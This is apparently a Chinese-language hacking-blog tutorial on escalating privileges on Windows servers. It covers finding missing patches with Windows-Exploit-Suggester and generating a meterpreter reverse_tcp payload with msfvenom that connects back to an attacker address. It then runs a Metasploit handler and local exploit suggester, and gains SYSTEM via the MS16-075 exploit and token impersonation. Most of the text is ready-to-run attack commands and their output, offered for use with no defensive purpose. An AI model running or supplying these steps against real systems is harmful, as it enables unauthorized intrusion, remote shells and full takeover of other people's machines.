1、 windows 补丁审计工具使用
在终端下可以使用命令systeminfo 来查看系统的一些补丁信息
补丁检测Windows-Exploit-Suggester
https://github.com/GDSSecurity/Windows-Exploit-Suggester
下载工具
git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
用法
首先安装pip install xlrd --upgrade 库
pip install xlrd--upgrade
更新漏洞补丁库
./windows-exploit-suggester.py--update
表里面的内容
目标 导出 系统信息 systeminfo>C:\inetpub\wwwroot\www.demo1.com\systeminfo.txt
查找可以利用的补丁
./windows-exploit-suggester.py--database 2019-05-02-mssb.xls --systeminfo systeminfo.txt >exp.txt
里面有详细的说明可以漏洞利用的exp 查找指定系统的可以用的漏洞
./windows-exploit-suggester.py--database 2019-05-02-mssb.xls --ostext 'windows server 2008 r2'
显示可利用的本地提权的条目
./windows-exploit-suggester.py --audit -l --database 2019-05-02-mssb.xls--systeminfo systeminfo.txt >win2008-day.txt
如果补丁没有打上的情况下,就会显示可以利用的ms编号 exp的地址和描述
提权exp windows-kernel-exploits
https://github.com/SecWiki/windows-kernel-exploits
2、msf结合windows-exploit-suggester使用
生成攻击载核
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.134 lport=12345 -f exe >/var/www/html/s.exe
监听
use exploit/multi/handler set payloadwindows/meterpreter/reverse_tcp set lhost192.168.0.134 set lport 12345 exploit
得到一个低权限的shell
background 返回 模块选择的命令把session 放到后台
使用suggester模块
use post/multi/recon/local_exploit_suggester show options set seesion 1
这里就是列出没有修补的漏洞
192.168.0.105 - Collecting local exploits for x86/windows... 192.168.0.105 - 29 exploit checks are being tried... [+] 192.168.0.105 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. [+] 192.168.0.105 - exploit/windows/local/ikeext_service: The target appears to be vulnerable. [+] 192.168.0.105 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. [+] 192.168.0.105 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable. [+] 192.168.0.105 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable. [+] 192.168.0.105 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 192.168.0.105 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 192.168.0.105 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated. [+] 192.168.0.105 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 192.168.0.105 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable. [+] 192.168.0.105 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
使用模块windows/local/ms16_075_reflection_juicy 进行
use windows/local/ms16_075_reflection_juicy show options 查看参数 set session 1 exploit
4、使用MS16-075 提权
选择第一个session sessions 1
use incognitolist_tokens-u //列出
tokensexecute -cH -f C:/inetpub/wwwroot/www.demo1.com/potato.exe //执行exp
list_tokens -uimpersonate_token"NT AUTHORITY\\SYSTEM" //提权
这个要多试用多次 方可成功
exploit
- 上一篇:渗透测试之通过代码审计打点
- 下一篇:最新完善版XSS平台源码 【40多个模块】
猜你还喜欢
- 08-04最全的webshell提权资料
- 09-16Linux后门整理合集
- 09-10实战Linux下三种不同方式的提权技巧
- 09-24Windows内网渗透提权的几个实用命令
- 08-03内网渗透:利用WMI代替psexec(WMIEXEC.vbs)
- 02-13ADB配置提权漏洞(CVE-2017-13212)原理与利用分析
- 11-16星外虚拟主机跨web目录文件读取技巧
- 06-05基于bro的计算机入侵取证实战分析
- 09-21渗透技巧——Windows单条日志的删除
- 08-03详解Filezilla提权
- 最新文章
- 随机文章
-
- uDork:一款功能强大的Google Hacking工具
- Metaspolit下配合Ngrok同时实现内网反弹+转发
- 黑客有哪几种类型?(10类黑客的介绍)
- 进攻即是最好的防御!19个练习黑客技术的在线网站
- 2019年最受欢迎的20款黑客工具
- 通过代码重用攻击绕过现代XSS防御
- GitHound:一款针对GitHub的API密钥和敏感数据搜索工具
- 手把手用C++解密Chrome80版本数据库
- 黑客声称窃取GitHub 500GB源代码,准备不出售直接泄露
- 流量分析的瑞士军刀:Zeek
- 窥探裸聊诈骗背后黑色产业链的一角
- 记一次渗透棋牌APP实录
- 一款针对Wordpress开发的代码审计工具——Wpbuttle(工具介绍与源码分析)
- DEDECMS伪随机漏洞 (一) :PHP下随机函数的研究
- 加密就安全了?一览用户的数据安全盲点
- 价值五千万美元的非洲IP地址盗窃案
- 雷电3接口漏洞影响数百万计算机:5分钟解锁设备,无法修复
- Alphanumeric Shellcode:纯字符Shellcode生成指南
- 从排查端口弱口令研究打造完美防御的思路
- linux后渗透之收集登录凭证
- 热门文章
-
- 九年专业安全团队承接渗透入侵维护服务
- Stuxnet纪录片-零日 Zero.Days (2016)【中文字幕】
- Emlog黑客站模板“Milw0rm”发布
- SQLMAP的注入命令以及使用方法
- 白帽故事汇:网络安全战士从来不是「男生」的专利
- 编辑器漏洞手册
- web安全之如何全面发现系统后台
- 常见Web源码泄露总结
- 深入理解JAVA反序列化漏洞
- cmseasy前台无需登录直接获取敏感数据的SQL注入(有POC证明)
- 网站后台登陆万能密码
- 黑客怎样简单入侵别人手机,黑客是如何入侵手机的?
- 黑麒麟2016渗透培训系列教程
- 破解emlog收费模板“Begin”
- 那些强悍的PHP一句话后门
- Android平台渗透测试套件zANTI v2.5发布(含详细说明)
- 渗透工具BackTrack与KaliLinux全套视频教程
- Python列为黑客应该学的四种编程语言之一 初学者该怎么学
- CVE-2017-11882漏洞复现和利用
- 恶意程序报告在线查询工具
- 文章标签
-